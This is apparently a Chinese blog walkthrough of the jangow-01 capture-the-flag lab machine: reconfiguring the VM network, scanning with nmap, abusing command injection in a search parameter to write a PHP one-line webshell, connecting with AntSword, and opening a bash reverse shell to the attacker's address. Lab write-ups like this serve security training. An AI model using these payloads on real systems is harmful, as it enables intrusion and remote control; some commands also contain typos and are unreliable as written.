jangow-01-1.0.1靶机漏洞解析

1、开启靶机

因为这个靶机原本是在virtualBOX运行的,如果我们在VM运行的话可能会发送冲突,导致扫不到靶机IP,所以需要给靶机修改一下配置

(1)靶机开机的时候长按shift,直到出现以下界面

(2)按e进入编辑模式

(3)把ro换成rw signie init=/bin/bash

(4)修改之后按ctrl+x进入以下界面

(5)输入ip a修改配置文件

vi /etc/network/interfaces

(6)回车进入下图

(7)按i进入编辑模式,在auto enp0s17以及他下面那一行的位置修改数据,修改为

auto ens33

iface ens33 inet dhcp

(8)按ESC后再按问号(相当于Linux里vim编辑,只是把冒号换成了问号)输入wq回车,出现以下界面,重启虚拟机

2、扫描靶机IP

nmap 192.168.19.1/24

扫到IP为192.168.19.163

3、访问IP

4、点击site看看有什么

点到Buscar之后,在URL发现有传参的地方

5、尝试注入

在网页中输入一个123,输入到1.txt中

发现可以成功传入1.txt

6、传入一句话木马

既然可以传送1.txt,那我们去尝试传入一句话木马到1.php中

echo '<?php @eval($_POST[cmd]);?>' >1.php

7、去访问我们的木马文件

没报错,说明我们的php文件已经上传了

8、用蚁剑去连接我们的木马

9、连接成功之后去反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.19.133/443 0>&1'

在kali开启监听

nv -lvvp 443

成功反弹到shell

10、执行一下命令

成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值